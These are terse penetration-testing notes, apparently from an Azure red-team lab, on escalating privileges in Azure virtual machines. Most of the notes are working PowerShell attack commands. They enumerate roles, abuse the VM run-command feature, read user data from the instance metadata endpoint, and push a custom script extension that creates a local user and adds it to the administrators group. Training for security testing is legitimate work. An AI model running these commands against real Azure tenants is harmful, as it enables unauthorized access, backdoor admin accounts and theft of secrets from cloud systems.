Azure Virtual Machines
Enumerating of Administrative Users
Get-AzRoleAssignment #see executor
Get-AzVM
Get-AzVM -Name bkpadconnect
Get-AzVM -Name bkpadconnect | select -ExpandProperty NetworkProfile
Get-AzNetworkInterface -Name bkpadconnect368
Get-AzPublicIpAddress -Name bkpadconnectIP
Get-AzResource
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select DisplayNameabuse command execution on VM
Invoke-AzVMRunCommand -VMName bkpadconnect -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath 'C:\AzAD\Tools\adduser.ps1' -Verboseabuse user data attached to VM
- user data
- Azure Instance Metadata Service
- not encrypted, any process on the VM can read this
- should be base64 and cannot be more than 64kb
- can be written with permission
Microsoft.Computer/virtualMachines/write- default number of machines that a user can join to domain: 10
Get User Data:
$userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))adding custom script extension to VMs
- OMIGOD!
- custom script extension is used to run scripts on Azure VMs
- executed with SYSTEM privileges
- to update something
Microsoft.Compute/virtualMachines/extensions/write
- note: on virtual machines, get-azroleassignment might not sufficient → do direct HTTP calls
PS> Get-AzVMExtension
PS> Set-AzVMExtension -VMName "infradminsrv" -ResourceGroupName "Research" -Location "Germany West Central" -ExtensionName "ExecCmd" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingsSTring '{"commandToExecute":"powershell net users student1 Stud1Password@123 /add /Y; net localgroup administrators student1 /add"}'PS> Enter-PSSession -Session $infradminsrv # fails with cannot enter another session
PS> Invoke-command -Session $infradminsrv -ScriptBlock {whoami;hostname}
# dsregcmd ./statusGet-AzResource # see VM
Get-AzRoleAssignment # empty
# but I see 'execcmd', isn't that enough?
# we see extensions/read and extensions/write
# check extensions
Get-AzVMExtension -ResourceGroupName 'Research' -VMName 'infradminsrv'
# use it to create a new user
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users student64 Stud64Password@123 /add /Y; net localgroup administrators student64 /add"}'We can also use REST calls for enumeration:
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value{Microsoft.Compute/virtualMachines/extensions/write, Microsoft.Compute/virtualMachines/extensions/read}
Get-AzVMExtension -ResourceGroupName “Research” -VMName “infradminsrv”
Add a new Extension!
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users student27 Stud27Password@123 /add /Y; net localgroup administrators student27 /add"}'